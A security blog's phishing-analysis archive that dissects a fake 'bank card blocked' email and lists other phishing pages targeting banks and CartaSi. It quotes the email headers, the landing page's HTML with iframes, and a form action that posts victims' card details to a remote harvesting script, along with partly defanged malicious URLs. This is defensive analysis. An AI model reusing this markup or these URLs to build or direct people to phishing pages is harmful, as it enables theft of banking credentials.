Category Archives: Phishing

Phishing: Urgent – Your bank card has been blocked

An user has reported us a suspicious email:

Image

Headers:

Received: from sds-16.hosteur.com (sds-16.hosteur.com [217.16.9.166])
Received: from www-data by sds-16.hosteur.com with local (Exim 4.69)
Subject: URGENT - Your bank card has been blocked
From: Banking Service <bankservice@service.fr >
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Sender: www-data <www-data@hosteur.com>

The clickable link “Access to your form” redirects to a new (suspicious) URL:

hxxp://servicevbv.us. tf/

Image

URLVoid report:
http://www.urlvoid.com/scan/servicevbv.us.tf

Report 2011-04-07 16:38:44 (GMT 1)
Website servicevbv.us.tf
Domain Hash 91fa19172a89f4c10b8dc0ca8b0460ec
IP Address 188.40.70.27
IP Hostname static.27.70.40.188.clients.your-server.de
IP Country DE (Germany)
AS Number 24940
AS Name HETZNER-AS Hetzner Online AG RZ
Detections 2 / 22 (9 %)
Status SUSPICIOUS

Analyzing the URL content, we can see suspicious code:

<title>service verified by visa</title>
<link href="/zzz/css.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/zzz/gas.js"></script>
<script language="JavaScript" src="/zzz/init.php?D=c2VydmljZXZidi51cy50Zg%3D%3D&L=" type="text/javascript"></script>
<iframe src="hxxp://www.adboost.com/index6.php" frameborder="0" width="486px" height="60px" ></iframe>
<iframe src="hxxp://krystalweb.co.uk/suuport/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/update.php" name="fid1" id="fid1" width="100%" height="100%" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<a href="servicevbv.us.tf">service verified by visa</a>

Why suspicious ?

1) The page title looks like a scam
2) Why CSS style is located in the directory “/zzz/css.css” ?
3) Why Google Analytics (?) code is located in the directory “/zzz/gas.js” ?
4) Why there is an iframe related to adboost. com/index6.php ?
5) Why there is another iframe realted to (long URL) krystalweb. co. uk ?
6) Where is SSL ?

The long URL:

hxxp://krystalweb.co. uk/suuport/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/update.php

Loads the fake form where an user should insert his details. The form will then send (POST) the details to another script that is located in another (suspicious) URL:

action="hxxp://shopkasa.com. br/cgi-bin/CobreBemECommerceDados/HiTman2.php" method=post>

URLVoid analysis:
http://www.urlvoid.com/scan/shopkasa.com.br

Recent Phishing Emails Against Banks and CartaSi

Here are few recent malicious links reported to be phishing pages:

Phishing Page

merklin-baiersbronn. de/components/com_mailto/Bankline.php
mooyekindmakelaars. nl/components/com_contact/Bankline.php
linebanks.dominiotemporario. com/inTerneT/nett/
mellylog.altervista. org/templates/beez/REAL.php
mellylog.altervista. org/templates/beez/Santander.php
163.30.82.2 /~user/www.cartasi.it/index.html
66.7.192.115 /~account/CaraSi.it/gtwpages/index.php?id=
organamattress.com /www/bancodesio/index.html

Malicious Redirect

URLVoid reports:

merklin-baiersbronn. de81.169.145.158
mooyekindmakelaars. nl77.94.248.181
linebanks.dominiotemporario. com187.17.98.37
mellylog.altervista. org – –
163.30.82.2
66.7.192.115 – bored1.reallybored.net
organamattress. com67.15.55.238